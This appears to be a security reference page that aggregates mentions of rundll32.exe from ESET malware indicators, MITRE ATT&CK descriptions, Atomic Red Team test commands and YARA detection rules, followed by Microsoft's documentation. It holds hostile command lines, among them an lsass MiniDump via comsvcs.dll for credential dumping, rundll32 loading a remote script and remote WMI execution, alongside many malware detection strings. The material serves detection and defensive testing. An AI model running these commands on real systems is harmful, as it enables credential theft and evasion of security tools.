malware-ioc misp_invisimole.json "tag_name": "misp-galaxy:mitre-attack-pattern=\"Rundll32 - T1085\"", © ESET 2014-2018
malware-ioc misp_invisimole.json "description": "The rundll32.exe program can be called to execute an arbitrary binary. Adversaries may take advantage of this functionality to proxy execution of code to avoid triggering security tools that may not monitor execution of the rundll32.exe process because of whitelists or false positives from Windows using rundll32.exe for normal operations.\n\nRundll32.exe can be used to execute Control Panel Item files (.cpl) through the undocumented shell32.dll functions <code>Control_RunDLL</code> and <code>Control_RunDLLAsUser</code>. Double-clicking a .cpl file also causes rundll32.exe to execute. (Citation: Trend Micro CPL)\n\nRundll32 can also been used to execute scripts such as JavaScript. This can be done using a syntax similar to this: <code>rundll32.exe javascript:\"\\..\\mshtml,RunHTMLApplication \";document.write();GetObject(\"script:https[:]//www[.]example[.]com/malicious.sct\")\"</code> This behavior has been seen used by malware such as Poweliks. (Citation: This is Security Command Line Confusion)", © ESET 2014-2018
malware-ioc misp_invisimole.json "description": "Windows User Account Control (UAC) allows a program to elevate its privileges to perform a task under administrator-level permissions by prompting the user for confirmation. The impact to the user ranges from denying the operation under high enforcement to allowing the user to perform the action if they are in the local administrators group and click through the prompt or allowing them to enter an administrator password to complete the action. (Citation: TechNet How UAC Works)\n\nIf the UAC protection level of a computer is set to anything but the highest level, certain Windows programs are allowed to elevate privileges or execute some elevated COM objects without prompting the user through the UAC notification box. (Citation: TechNet Inside UAC) (Citation: MSDN COM Elevation) An example of this is use of rundll32.exe to load a specifically crafted DLL which loads an auto-elevated COM object and performs a file operation in a protected directory which would typically require elevated access. Malicious software may also be injected into a trusted process to gain elevated privileges without prompting a user. (Citation: Davidson Windows) Adversaries can use these techniques to elevate privileges to administrator if the target process is unprotected.\n\nMany methods have been discovered to bypass UAC. The Github readme page for UACMe contains an extensive list of methods (Citation: Github UACMe) that have been discovered and implemented within UACMe, but may not be a comprehensive list of bypasses. Additional bypass methods are regularly discovered and some used in the wild, such as:\n\n* <code>eventvwr.exe</code> can auto-elevate and execute a specified binary or script. (Citation: enigma0x3 Fileless UAC Bypass) (Citation: Fortinet Fareit)\n\nAnother bypass is possible through some Lateral Movement techniques if credentials for an account with administrator privileges are known, since UAC is a single system security mechanism, and the privilege or integrity of a process running on one system will be unknown on lateral systems and default to high integrity. (Citation: SANS UAC Bypass)", © ESET 2014-2018
malware-ioc misp_invisimole.json "description": "Masquerading occurs when the name or location of an executable, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. Several different variations of this technique have been observed.\n\nOne variant is for an executable to be placed in a commonly trusted directory or given the name of a legitimate, trusted program. Alternatively, the filename given may be a close approximation of legitimate programs or something innocuous. An example of this is when a common system utility or program is moved and renamed to avoid detection based on its usage.(Citation: FireEye APT10 Sept 2018) This is done to bypass tools that trust executables by relying on file name or path, as well as to deceive defenders and system administrators into thinking a file is benign by associating the name with something that is thought to be legitimate.\n\nA third variant uses the right-to-left override (RTLO or RLO) character (U+202E) as a means of tricking a user into executing what they think is a benign file type but is actually executable code. RTLO is a non-printing character that causes the text that follows it to be displayed in reverse.(Citation: Infosecinstitute RTLO Technique) For example, a Windows screensaver file named <code>March 25 \\u202Excod.scr</code> will display as <code>March 25 rcs.docx</code>. A JavaScript file named <code>photo_high_re\\u202Egnp.js</code> will be displayed as <code>photo_high_resj.png</code>. A common use of this technique is with spearphishing attachments since it can trick both end users and defenders if they are not aware of how their tools display and render the RTLO character. Use of the RTLO character has been seen in many targeted intrusion attempts and criminal activity.(Citation: Trend Micro PLEAD RTLO)(Citation: Kaspersky RTLO Cyber Crime) RTLO can be used in the Windows Registry as well, where regedit.exe displays the reversed characters but the command line tool reg.exe does not by default. \n\nAdversaries may modify a binary's metadata, including such fields as icons, version, name of the product, description, and copyright, to better blend in with the environment and increase chances of deceiving a security analyst or product.(Citation: Threatexpress MetaTwin 2017)\n\n### Windows\nIn another variation of this technique, an adversary may use a renamed copy of a legitimate utility, such as rundll32.exe. (Citation: Endgame Masquerade Ball) An alternative case occurs when a legitimate utility is moved to a different directory and also renamed to avoid detections based on system utilities executing from non-standard paths. (Citation: F-Secure CozyDuke)\n\nAn example of abuse of trusted locations in Windows would be the <code>C:\\Windows\\System32</code> directory. Examples of trusted binary names that can be given to malicious binares include \"explorer.exe\" and \"svchost.exe\".\n\n### Linux\nAnother variation of this technique includes malicious binaries changing the name of their running process to that of a trusted or benign process, after they have been launched as opposed to before. (Citation: Remaiten)\n\nAn example of abuse of trusted locations in Linux would be the <code>/bin</code> directory. Examples of trusted binary names that can be given to malicious binaries include \"rsyncd\" and \"dbus-inotifier\". (Citation: Fysbis Palo Alto Analysis) (Citation: Fysbis Dr Web Analysis)", © ESET 2014-2018
malware-ioc misp_invisimole.json "name": "misp-galaxy:mitre-attack-pattern=\"Rundll32 - T1085\"", © ESET 2014-2018
malware-ioc invisimole %WINDIR%\SysWOW64\drivers\Rundll32.exe © ESET 2014-2018
malware-ioc invisimole "FlashConfigEnrollee" = "shell32 ShellExec_RunDLL "C:\Windows\SysWOW64\drivers\Rundll32.exe" "C:\Windows\SysWOW64\drivers\wdigest.dll",SpInitialize %SHELLCODE_BYTES%" © ESET 2014-2018
malware-ioc win_apt_invisimole_sminit_chain.yml - 'rundll32.exe shell32.dll,ShellExec_RundDLL' © ESET 2014-2018
malware-ioc win_apt_invisimole_wdigest_chain.yml CommandLine\|contains: 'rundll32.exe Shell32.dll ShellExec_RunDLL cmd.exe /c mkdir SMRTNTKY\MessageB.txt' © ESET 2014-2018
malware-ioc win_apt_invisimole_wdigest_chain.yml - '\Windows\SysWOW64\drivers\Rundll32.exe' © ESET 2014-2018
malware-ioc win_apt_invisimole_wrapper_dll.yml Image\|endswith: '\rundll32.exe' © ESET 2014-2018
malware-ioc win_suspicious_rundll32.yml title: Suspicious Execution of Rundll32.exe © ESET 2014-2018
malware-ioc win_suspicious_rundll32.yml description: Detects instances when Rundll32.exe is executed outside of the system folder, or when Rundll32.exe is unsigned. InvisiMole Group uses a Windows XP version of Rundll32.exe to load and exploit a vulnerable Windows XP library. As Rundll32.exe is signed by a catalog file, older versions will not be signed on newer OS versions which can trigger this detection. © ESET 2014-2018
malware-ioc win_suspicious_rundll32.yml - Rundll32.exe intentionally copied outside of the system folder. © ESET 2014-2018
malware-ioc win_suspicious_rundll32.yml - Legitimate use of older version of Rundll32.exe on newer OS © ESET 2014-2018
malware-ioc win_suspicious_rundll32.yml Image\|endswith: 'rundll32.exe' © ESET 2014-2018
malware-ioc win_suspicious_rundll32.yml - '\Windows\SysWOW64\rundll32.exe' © ESET 2014-2018
malware-ioc win_suspicious_rundll32.yml - '\Windows\system32\rundll32.exe' © ESET 2014-2018
malware-ioc win_suspicious_rundll32.yml - 'rundll32.exe' © ESET 2014-2018
malware-ioc rtm Windows Update = rundll32.exe "%PROGRAMDATA%\Winlogon\winlogon.lnk",DllGetClassObject host © ESET 2014-2018
malware-ioc rtm rundll32.exe © ESET 2014-2018
atomic-red-team index.md - Atomic Test #7: Invoke HTML Application - JScript Engine with Rundll32 and Inline Protocol Handler [windows] MIT License. © 2018 Red Canary
atomic-red-team index.md - T1218.011 Rundll32 MIT License. © 2018 Red Canary
atomic-red-team index.md - Atomic Test #1: Rundll32 execute JavaScript Remote Payload With GetObject [windows] MIT License. © 2018 Red Canary
atomic-red-team index.md - Atomic Test #2: Rundll32 execute VBscript command [windows] MIT License. © 2018 Red Canary
atomic-red-team index.md - Atomic Test #3: Rundll32 advpack.dll Execution [windows] MIT License. © 2018 Red Canary
atomic-red-team index.md - Atomic Test #4: Rundll32 ieadvpack.dll Execution [windows] MIT License. © 2018 Red Canary
atomic-red-team index.md - Atomic Test #5: Rundll32 syssetup.dll Execution [windows] MIT License. © 2018 Red Canary
atomic-red-team index.md - Atomic Test #6: Rundll32 setupapi.dll Execution [windows] MIT License. © 2018 Red Canary
atomic-red-team index.md - Atomic Test #7: Execution of HTA and VBS Files using Rundll32 and URL.dll [windows] MIT License. © 2018 Red Canary
atomic-red-team index.md - Atomic Test #8: Launches an executable using Rundll32 and pcwutl.dll [windows] MIT License. © 2018 Red Canary
atomic-red-team index.md - Atomic Test #9: Execution of non-dll using rundll32.exe [windows] MIT License. © 2018 Red Canary
atomic-red-team index.md - Atomic Test #10: Rundll32 with Ordinal Value [windows] MIT License. © 2018 Red Canary
atomic-red-team index.md - Atomic Test #11: Rundll32 with Control_RunDLL [windows] MIT License. © 2018 Red Canary
atomic-red-team index.md - Atomic Test #9: WMI Execute rundll32 [windows] MIT License. © 2018 Red Canary
atomic-red-team windows-index.md - Atomic Test #7: Invoke HTML Application - JScript Engine with Rundll32 and Inline Protocol Handler [windows] MIT License. © 2018 Red Canary
atomic-red-team windows-index.md - T1218.011 Rundll32 MIT License. © 2018 Red Canary
atomic-red-team windows-index.md - Atomic Test #1: Rundll32 execute JavaScript Remote Payload With GetObject [windows] MIT License. © 2018 Red Canary
atomic-red-team windows-index.md - Atomic Test #2: Rundll32 execute VBscript command [windows] MIT License. © 2018 Red Canary
atomic-red-team windows-index.md - Atomic Test #3: Rundll32 advpack.dll Execution [windows] MIT License. © 2018 Red Canary
atomic-red-team windows-index.md - Atomic Test #4: Rundll32 ieadvpack.dll Execution [windows] MIT License. © 2018 Red Canary
atomic-red-team windows-index.md - Atomic Test #5: Rundll32 syssetup.dll Execution [windows] MIT License. © 2018 Red Canary
atomic-red-team windows-index.md - Atomic Test #6: Rundll32 setupapi.dll Execution [windows] MIT License. © 2018 Red Canary
atomic-red-team windows-index.md - Atomic Test #7: Execution of HTA and VBS Files using Rundll32 and URL.dll [windows] MIT License. © 2018 Red Canary
atomic-red-team windows-index.md - Atomic Test #8: Launches an executable using Rundll32 and pcwutl.dll [windows] MIT License. © 2018 Red Canary
atomic-red-team windows-index.md - Atomic Test #9: Execution of non-dll using rundll32.exe [windows] MIT License. © 2018 Red Canary
atomic-red-team windows-index.md - Atomic Test #10: Rundll32 with Ordinal Value [windows] MIT License. © 2018 Red Canary
atomic-red-team windows-index.md - Atomic Test #11: Rundll32 with Control_RunDLL [windows] MIT License. © 2018 Red Canary
atomic-red-team windows-index.md - Atomic Test #9: WMI Execute rundll32 [windows] MIT License. © 2018 Red Canary
atomic-red-team matrix.md | | | | | Rundll32 | | | | | | | | MIT License. © 2018 Red Canary
atomic-red-team windows-matrix.md | | | | | Rundll32 | | | | | | | | MIT License. © 2018 Red Canary
atomic-red-team T1003.md C:\Windows\System32\rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump $id $env:TEMP\svchost-exe.dmp full MIT License. © 2018 Red Canary
atomic-red-team T1003.001.md C:\Windows\System32\rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump (Get-Process lsass).id $env:TEMP\lsass-comsvcs.dmp full MIT License. © 2018 Red Canary
atomic-red-team T1036.003.md <blockquote>Adversaries may rename legitimate system utilities to try to evade security mechanisms concerning the usage of those utilities. Security monitoring and control mechanisms may be in place for system utilities adversaries are capable of abusing. (Citation: LOLBAS Main Site) It may be possible to bypass those security mechanisms by renaming the utility prior to utilization (ex: rename rundll32.exe). (Citation: Elastic Masquerade Ball) An alternative case occurs when a legitimate utility is copied or moved to a different directory and renamed to avoid detections based on system utilities executing from non-standard paths. (Citation: F-Secure CozyDuke)</blockquote> MIT License. © 2018 Red Canary
atomic-red-team T1047.md - Atomic Test #9 - WMI Execute rundll32 MIT License. © 2018 Red Canary
atomic-red-team T1047.md Invoke-WMIMethod win32_process -name create -argumentlist ‘rundll32 c:\windows\idmu\common\ypprop.dll _XInitImageFuncPtrs’ -ComputerName WORKSTATION MIT License. © 2018 Red Canary
atomic-red-team T1047.md ## Atomic Test #9 - WMI Execute rundll32 MIT License. © 2018 Red Canary
atomic-red-team T1047.md This test uses wmic.exe to execute a DLL function using rundll32. Specify a valid value for remote IP using the node parameter. MIT License. © 2018 Red Canary
atomic-red-team T1047.md wmic /node:#{node} process call create “rundll32.exe #{dll_to_execute} #{function_to_execute}” MIT License. © 2018 Red Canary
atomic-red-team T1134.004.md Adversaries may abuse these mechanisms to evade defenses, such as those blocking processes spawning directly from Office documents, and analysis targeting unusual/potentially malicious parent-child process relationships, such as spoofing the PPID of PowerShell/Rundll32 to be explorer.exe rather than an Office document delivered as part of Spearphishing Attachment.(Citation: CounterCept PPID Spoofing Dec 2018) This spoofing could be executed via Visual Basic within a malicious Office document or any code that can perform Native API.(Citation: CTD PPID Spoofing Macro Mar 2019)(Citation: CounterCept PPID Spoofing Dec 2018) MIT License. © 2018 Red Canary
atomic-red-team T1218.005.md - Atomic Test #7 - Invoke HTML Application - JScript Engine with Rundll32 and Inline Protocol Handler MIT License. © 2018 Red Canary
atomic-red-team T1218.005.md ## Atomic Test #7 - Invoke HTML Application - JScript Engine with Rundll32 and Inline Protocol Handler MIT License. © 2018 Red Canary
atomic-red-team T1218.005.md Executes an HTA Application with JScript Engine, Rundll32 and Inline Protocol Handler. MIT License. © 2018 Red Canary
atomic-red-team T1218.005.md | rundll32_file_path | Location of rundll32.exe | Path | $env:windir\system32\rundll32.exe| MIT License. © 2018 Red Canary
atomic-red-team T1218.011.md # T1218.011 - Rundll32 MIT License. © 2018 Red Canary
atomic-red-team T1218.011.md <blockquote>Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. Shared Modules), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads. MIT License. © 2018 Red Canary
atomic-red-team T1218.011.md Rundll32.exe can also be used to execute Control Panel Item files (.cpl) through the undocumented shell32.dll functions Control_RunDLL and Control_RunDLLAsUser. Double-clicking a .cpl file also causes rundll32.exe to execute. (Citation: Trend Micro CPL) MIT License. © 2018 Red Canary
atomic-red-team T1218.011.md Rundll32 can also be used to execute scripts such as JavaScript. This can be done using a syntax similar to this: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:https[:]//www[.]example[.]com/malicious.sct")" This behavior has been seen used by malware such as Poweliks. (Citation: This is Security Command Line Confusion)</blockquote> MIT License. © 2018 Red Canary
atomic-red-team T1218.011.md - Atomic Test #1 - Rundll32 execute JavaScript Remote Payload With GetObject MIT License. © 2018 Red Canary
atomic-red-team T1218.011.md - Atomic Test #2 - Rundll32 execute VBscript command MIT License. © 2018 Red Canary
atomic-red-team T1218.011.md - Atomic Test #3 - Rundll32 advpack.dll Execution MIT License. © 2018 Red Canary
atomic-red-team T1218.011.md - Atomic Test #4 - Rundll32 ieadvpack.dll Execution MIT License. © 2018 Red Canary
atomic-red-team T1218.011.md - Atomic Test #5 - Rundll32 syssetup.dll Execution MIT License. © 2018 Red Canary
atomic-red-team T1218.011.md - Atomic Test #6 - Rundll32 setupapi.dll Execution MIT License. © 2018 Red Canary
atomic-red-team T1218.011.md - Atomic Test #7 - Execution of HTA and VBS Files using Rundll32 and URL.dll MIT License. © 2018 Red Canary
atomic-red-team T1218.011.md - Atomic Test #8 - Launches an executable using Rundll32 and pcwutl.dll MIT License. © 2018 Red Canary
atomic-red-team T1218.011.md - Atomic Test #9 - Execution of non-dll using rundll32.exe MIT License. © 2018 Red Canary
atomic-red-team T1218.011.md - Atomic Test #10 - Rundll32 with Ordinal Value MIT License. © 2018 Red Canary
atomic-red-team T1218.011.md - Atomic Test #11 - Rundll32 with Control_RunDLL MIT License. © 2018 Red Canary
atomic-red-team T1218.011.md ## Atomic Test #1 - Rundll32 execute JavaScript Remote Payload With GetObject MIT License. © 2018 Red Canary
atomic-red-team T1218.011.md Test execution of a remote script using rundll32.exe. Upon execution notepad.exe will be opened. MIT License. © 2018 Red Canary
atomic-red-team T1218.011.md rundll32.exe javascript:”..\mshtml,RunHTMLApplication “;document.write();GetObject(“script:#{file_url}”).Exec(); MIT License. © 2018 Red Canary
atomic-red-team T1218.011.md ## Atomic Test #2 - Rundll32 execute VBscript command MIT License. © 2018 Red Canary
atomic-red-team T1218.011.md Test execution of a command using rundll32.exe and VBscript in a similar manner to the JavaScript test. MIT License. © 2018 Red Canary
atomic-red-team T1218.011.md Technique documented by Hexacorn- http://www.hexacorn.com/blog/2019/10/29/rundll32-with-a-vbscript-protocol/ MIT License. © 2018 Red Canary
atomic-red-team T1218.011.md | command_to_execute | Command for rundll32.exe to execute | String | calc.exe| MIT License. © 2018 Red Canary
atomic-red-team T1218.011.md rundll32 vbscript:”..\mshtml,RunHTMLApplication “+String(CreateObject(“WScript.Shell”).Run(“#{command_to_execute}”),0) MIT License. © 2018 Red Canary
atomic-red-team T1218.011.md ## Atomic Test #3 - Rundll32 advpack.dll Execution MIT License. © 2018 Red Canary
atomic-red-team T1218.011.md Test execution of a command using rundll32.exe with advpack.dll. MIT License. © 2018 Red Canary
atomic-red-team T1218.011.md rundll32.exe advpack.dll,LaunchINFSection #{inf_to_execute},DefaultInstall_SingleUser,1, MIT License. © 2018 Red Canary
atomic-red-team T1218.011.md ## Atomic Test #4 - Rundll32 ieadvpack.dll Execution MIT License. © 2018 Red Canary
atomic-red-team T1218.011.md Test execution of a command using rundll32.exe with ieadvpack.dll. MIT License. © 2018 Red Canary
atomic-red-team T1218.011.md rundll32.exe ieadvpack.dll,LaunchINFSection #{inf_to_execute},DefaultInstall_SingleUser,1, MIT License. © 2018 Red Canary
atomic-red-team T1218.011.md ## Atomic Test #5 - Rundll32 syssetup.dll Execution MIT License. © 2018 Red Canary
atomic-red-team T1218.011.md Test execution of a command using rundll32.exe with syssetup.dll. Upon execution, a window saying “installation failed” will be opened MIT License. © 2018 Red Canary
atomic-red-team T1218.011.md rundll32.exe syssetup.dll,SetupInfObjectInstallAction DefaultInstall 128 .#{inf_to_execute} MIT License. © 2018 Red Canary
atomic-red-team T1218.011.md ## Atomic Test #6 - Rundll32 setupapi.dll Execution MIT License. © 2018 Red Canary
atomic-red-team T1218.011.md Test execution of a command using rundll32.exe with setupapi.dll. Upon execution, a windows saying “installation failed” will be opened MIT License. © 2018 Red Canary
atomic-red-team T1218.011.md rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 .#{inf_to_execute} MIT License. © 2018 Red Canary
atomic-red-team T1218.011.md ## Atomic Test #7 - Execution of HTA and VBS Files using Rundll32 and URL.dll MIT License. © 2018 Red Canary
atomic-red-team T1218.011.md rundll32.exe url.dll,OpenURL %PUBLIC%\index.hta MIT License. © 2018 Red Canary
atomic-red-team T1218.011.md rundll32.exe URL.dll,FileProtocolHandler C:\..\Detail\akteullen.vbs MIT License. © 2018 Red Canary
atomic-red-team T1218.011.md In this atomic, the sample hta file opens the calculator and the vbs file shows a message dialog with “rundll32 spawned wscript” MIT License. © 2018 Red Canary
atomic-red-team T1218.011.md rundll32.exe url.dll,OpenURL PathToAtomicsFolder\T1218.011\src\index.hta MIT License. © 2018 Red Canary
atomic-red-team T1218.011.md rundll32.exe URL.dll,FileProtocolHandler PathToAtomicsFolder\T1218.011\src\akteullen.vbs MIT License. © 2018 Red Canary
atomic-red-team T1218.011.md ## Atomic Test #8 - Launches an executable using Rundll32 and pcwutl.dll MIT License. © 2018 Red Canary
atomic-red-team T1218.011.md rundll32.exe pcwutl.dll,LaunchApplication #{exe_to_launch} MIT License. © 2018 Red Canary
atomic-red-team T1218.011.md ## Atomic Test #9 - Execution of non-dll using rundll32.exe MIT License. © 2018 Red Canary
atomic-red-team T1218.011.md Rundll32.exe running non-dll MIT License. © 2018 Red Canary
atomic-red-team T1218.011.md rundll32.exe #{input_file}, StartW MIT License. © 2018 Red Canary
atomic-red-team T1218.011.md ## Atomic Test #10 - Rundll32 with Ordinal Value MIT License. © 2018 Red Canary
atomic-red-team T1218.011.md Rundll32.exe loading dll using ordinal value #2 to DLLRegisterServer. MIT License. © 2018 Red Canary
atomic-red-team T1218.011.md rundll32.exe #{input_file},#2 MIT License. © 2018 Red Canary
atomic-red-team T1218.011.md ## Atomic Test #11 - Rundll32 with Control_RunDLL MIT License. © 2018 Red Canary
atomic-red-team T1218.011.md Rundll32.exe loading dll with ‘control_rundll’ within the command-line, loading a .cpl or another file type related to CVE-2021-40444. MIT License. © 2018 Red Canary
atomic-red-team T1218.011.md rundll32.exe shell32.dll,Control_RunDLL #{input_file} MIT License. © 2018 Red Canary
atomic-red-team T1546.015.md This test uses PowerShell to hijack a reference to a Component Object Model by creating registry values under InprocServer32 key in the HKCU hive then calling the Class ID to be executed via rundll32.exe. MIT License. © 2018 Red Canary
atomic-red-team T1546.015.md Start-Process -FilePath “C:\Windows\System32\RUNDLL32.EXE” -ArgumentList ‘-sta #{clsid}’ MIT License. © 2018 Red Canary
atomic-red-team T1548.002.md If the UAC protection level of a computer is set to anything but the highest level, certain Windows programs can elevate privileges or execute some elevated Component Object Model objects without prompting the user through the UAC notification box. (Citation: TechNet Inside UAC) (Citation: MSDN COM Elevation) An example of this is use of Rundll32 to load a specifically crafted DLL which loads an auto-elevated Component Object Model object and performs a file operation in a protected directory which would typically require elevated access. Malicious software may also be injected into a trusted process to gain elevated privileges without prompting a user.(Citation: Davidson Windows) MIT License. © 2018 Red Canary
atomic-red-team T1564.006.md rundll32 “C:\Program Files\Oracle\VirtualBox\VBoxRT.dll,RTR3Init” MIT License. © 2018 Red Canary
signature-base apt_apt29_nobelium_may21.yar $a1 = “rundll32.exe” wide CC BY-NC 4.0
signature-base apt_apt29_nobelium_may21.yar $s2 = “rundll32.exe %s %s” ascii fullword CC BY-NC 4.0
signature-base apt_apt29_nobelium_may21.yar $s1 = “rundll32.exe {0} {1}” wide fullword CC BY-NC 4.0
signature-base apt_apt41.yar $s1 = “Rundll32.exe "%s", DisPlay 64” fullword ascii CC BY-NC 4.0
signature-base apt_codoso.yar $s0 = “rundll32 "%s",%s” fullword ascii CC BY-NC 4.0
signature-base apt_codoso.yar $s1 = “rundll32.exe "%s", RunMeByDLL32” fullword ascii CC BY-NC 4.0
signature-base apt_codoso.yar $x2 = “rundll32.exe "%s", RunMeByDLL32” fullword ascii CC BY-NC 4.0
signature-base apt_derusbi.yar $x4 = “rundll32.exe "%s", R32 %s” fullword wide CC BY-NC 4.0
signature-base apt_emissary.yar $s3 = “rundll32.exe "%s",Setting” fullword ascii CC BY-NC 4.0
signature-base apt_freemilk.yar $s4 = “outFile=sysDir&"\rundll32.exe"” fullword ascii CC BY-NC 4.0
signature-base apt_glassRAT.yar // $bin2 = {34 02} // xor al, 2 —> XOR key for rundll32.exe CC BY-NC 4.0
signature-base apt_glassRAT.yar $s1 = “pwlfnn10,gzg” // rundll32.exe XOR 02 CC BY-NC 4.0
signature-base apt_glassRAT.yar $s6 = “rundll32 "%s",AddNum” fullword ascii CC BY-NC 4.0
signature-base apt_golddragon.yar $x2 = “rundll32.exe %s RunningRat” fullword ascii CC BY-NC 4.0
signature-base apt_golddragon.yar $x4 = “rundll32.exe %s ExportFunction” fullword ascii CC BY-NC 4.0
signature-base apt_golddragon.yar $x5 = “rundll32.exe "%s" RunningRat” fullword ascii CC BY-NC 4.0
signature-base apt_golddragon.yar $s5 = “rundll32.exe "%s" Run” fullword ascii CC BY-NC 4.0
signature-base apt_keyboys.yar $s4 = “rundll32.exe %s Main” fullword ascii CC BY-NC 4.0
signature-base apt_keyboys.yar $x1 = “rundll32.exe %s SSSS & exit” fullword ascii CC BY-NC 4.0
signature-base apt_keyboys.yar $x1 = “%s\rundll32.exe %s ServiceTake %s %s” fullword ascii CC BY-NC 4.0
signature-base apt_khrat.yar $x2 = “CreateObject("WScript.Shell").Run "rundll32.exe javascript:""\..\mshtml,RunHTMLApplication” ascii CC BY-NC 4.0
signature-base apt_korplug_fast.yar $x1 = “%s\rundll32.exe "%s", ShadowPlay” fullword ascii CC BY-NC 4.0
signature-base apt_korplug_fast.yar $s1 = “%s\rundll32.exe "%s",” fullword ascii CC BY-NC 4.0
signature-base apt_op_cloudhopper.yar $s2 = “rundll32.exe "%s", UnInstall /update %s” fullword wide CC BY-NC 4.0
signature-base apt_rokrat.yar $x3 = “outFile=sysDir&"\rundll32.exe"” fullword ascii CC BY-NC 4.0
signature-base apt_sakula.yar $str02 = “cmd.exe /c rundll32 "%s" Play "%s"” CC BY-NC 4.0
signature-base apt_sakula.yar $str08 = “cmd.exe /c rundll32 "%s" ActiveQvaw "%s"” CC BY-NC 4.0
signature-base apt_sofacy_oct17_camp.yar $s1 = “start rundll32.exe %path %,#1a” fullword ascii CC BY-NC 4.0
signature-base apt_tidepool.yar $s2 = “C:\Windows\System32\rundll32.exe” fullword wide CC BY-NC 4.0
signature-base apt_ua_hermetic_wiper.yar $sx1 = “/c powershell -c "rundll32 C:\windows\system32\comsvcs.dll MiniDump” ascii wide CC BY-NC 4.0
signature-base apt_wildneutron.yar $s0 = “rundll32.exe "%s",#1” fullword wide /* PEStudio Blacklist: strings / / score: ‘33.00’ */ CC BY-NC 4.0
signature-base apt_wilted_tulip.yar $s1 = “%s\system32\rundll32.exe” fullword wide CC BY-NC 4.0
signature-base apt_wilted_tulip.yar $r1 = “C:\Windows\syswow64\rundll32.exe</Command>” fullword wide CC BY-NC 4.0
signature-base apt_wilted_tulip.yar $s2 = “%s\system32\rundll32.exe” fullword wide CC BY-NC 4.0
signature-base apt_wilted_tulip.yar $s3 = “%s\SysWOW64\rundll32.exe” fullword wide CC BY-NC 4.0
signature-base apt_winnti.yar $a9 = “\rundll32.exe” wide CC BY-NC 4.0
signature-base apt_winnti_burning_umbrella.yar $s2 = “rundll32.exe %s,Startup” fullword ascii CC BY-NC 4.0
signature-base cn_pentestset_webshells.yar $s3 = “$cmd="cmd /c rundll32.exe $path,install $openPort $activeStr";” fullword ascii /* PEStudio Blacklist: strings */ CC BY-NC 4.0
signature-base crime_badrabbit.yar $s9 = “process call create "C:\Windows\System32\rundll32.exe” fullword wide CC BY-NC 4.0
signature-base crime_fireball.yar $s2 = “rundll32.exe "%s",%s” fullword wide CC BY-NC 4.0
signature-base crime_fireball.yar $s2 = “RunDll32.exe "” fullword wide CC BY-NC 4.0
signature-base crime_kriskynote.yar $s1 = “rundll32 %s Check” fullword ascii CC BY-NC 4.0
signature-base crime_nopetya_jun17.yar $x2 = “process call create "C:\Windows\System32\rundll32.exe \"C:\Windows\%s\" #1 “ fullword wide CC BY-NC 4.0
signature-base crime_nopetya_jun17.yar $x3 = “-d C:\Windows\System32\rundll32.exe "C:\Windows\%s",#1 “ fullword wide CC BY-NC 4.0
signature-base crime_nopetya_jun17.yar /* ,#1 ….. rundll32.exe */ CC BY-NC 4.0
signature-base generic_anomalies.yar description = “Detects uncommon file size of rundll32.exe” CC BY-NC 4.0
signature-base generic_anomalies.yar and filename == “rundll32.exe” CC BY-NC 4.0
signature-base gen_gen_cactustorch.yar $x6 = “Dim binary : binary = "rundll32.exe"” fullword ascii CC BY-NC 4.0
signature-base gen_gen_cactustorch.yar $s1 = “binary = "rundll32.exe"” fullword ascii CC BY-NC 4.0
signature-base gen_gen_cactustorch.yar $s4 = “var binary = "rundll32.exe";” fullword ascii CC BY-NC 4.0
signature-base gen_malware_set_qa.yar $s4 = “\sysnative\rundll32.exe” fullword ascii CC BY-NC 4.0
signature-base gen_powershdll.yar $x1 = “rundll32 PowerShdll,main -f " fullword wide CC BY-NC 4.0
signature-base gen_powershdll.yar $x3 = “rundll32 PowerShdll,main CC BY-NC 4.0
signature-base gen_rats_malwareconfig.yar $s7 = “cmd.exe /c rundll32 "%s"” CC BY-NC 4.0
signature-base gen_url_persitence.yar $file1 = /\x0a\x0d\s=[^\x0d](powershell|cmd|certutil|mshta|wscript|cscript|rundll32|wmic|regsvr32|msbuild)(.exe|)[^\x0d]{2,50}\x0d/ nocase CC BY-NC 4.0
signature-base yara_mixed_ext_vars.yar description = “Tool used in Operation Cloud Hopper - pscp.exe cloaked as rundll32.exe” CC BY-NC 4.0
signature-base yara_mixed_ext_vars.yar all of them and filename == “rundll32.exe” CC BY-NC 4.0

Additional Info*

*The information below is copied from MicrosoftDocs, which is maintained by Microsoft. Available under CC BY 4.0 license.


rundll32

Loads and runs 32-bit dynamic-link libraries (DLLs). There are no configurable settings for Rundll32. Help information is provided for a specific DLL you run with the rundll32 command.

You must run the rundll32 command from an elevated command prompt. To open an elevated command prompt, click Start, right-click Command Prompt, and then click Run as administrator.

Syntax

rundll32 <DLLname>

Parameters

Parameter Description
Rundll32 printui.dll,PrintUIEntry Displays the printer user interface.

Remarks

Rundll32 can only call functions from a DLL explicitly written to be called by Rundll32.

Additional References


MIT License. Copyright (c) 2020-2021 Strontic.